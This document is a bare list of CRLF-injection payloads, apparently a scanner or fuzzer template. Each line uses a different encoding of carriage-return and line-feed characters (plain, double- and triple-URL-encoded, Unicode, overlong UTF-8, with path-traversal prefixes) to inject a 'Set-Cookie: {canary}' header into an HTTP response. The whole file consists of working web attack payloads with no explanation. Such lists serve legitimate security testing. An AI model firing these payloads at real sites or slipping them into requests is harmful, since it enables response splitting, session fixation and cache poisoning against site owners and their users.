%0aSet-Cookie: {canary}
%0dSet-Cookie: {canary}
%0d%0aSet-Cookie: {canary}
%0d%0a%0d%0aSet-Cookie: {canary}
%250aSet-Cookie: {canary}
%250dSet-Cookie: {canary}
%250d%250aSet-Cookie: {canary}
%25250aSet-Cookie: {canary}
%25250d%25250aSet-Cookie: {canary}
%u000aSet-Cookie: {canary}
%u000d%u000aSet-Cookie: {canary}
%u2028%u2029Set-Cookie: {canary}
..%2f%0d%0aSet-Cookie: {canary}
..%5c%0d%0aSet-Cookie: {canary}
%2e%2e%2f%0d%0aSet-Cookie: {canary}
%2f%2e%2e%0d%0aSet-Cookie: {canary}
%25%30%61Set-Cookie: {canary}
%25%30aSet-Cookie: {canary}
%c0%8d%c0%8aSet-Cookie: {canary}
%ea%a8%8aSet-Cookie: {canary}
%c4%8d%c4%8aSet-Cookie: {canary}
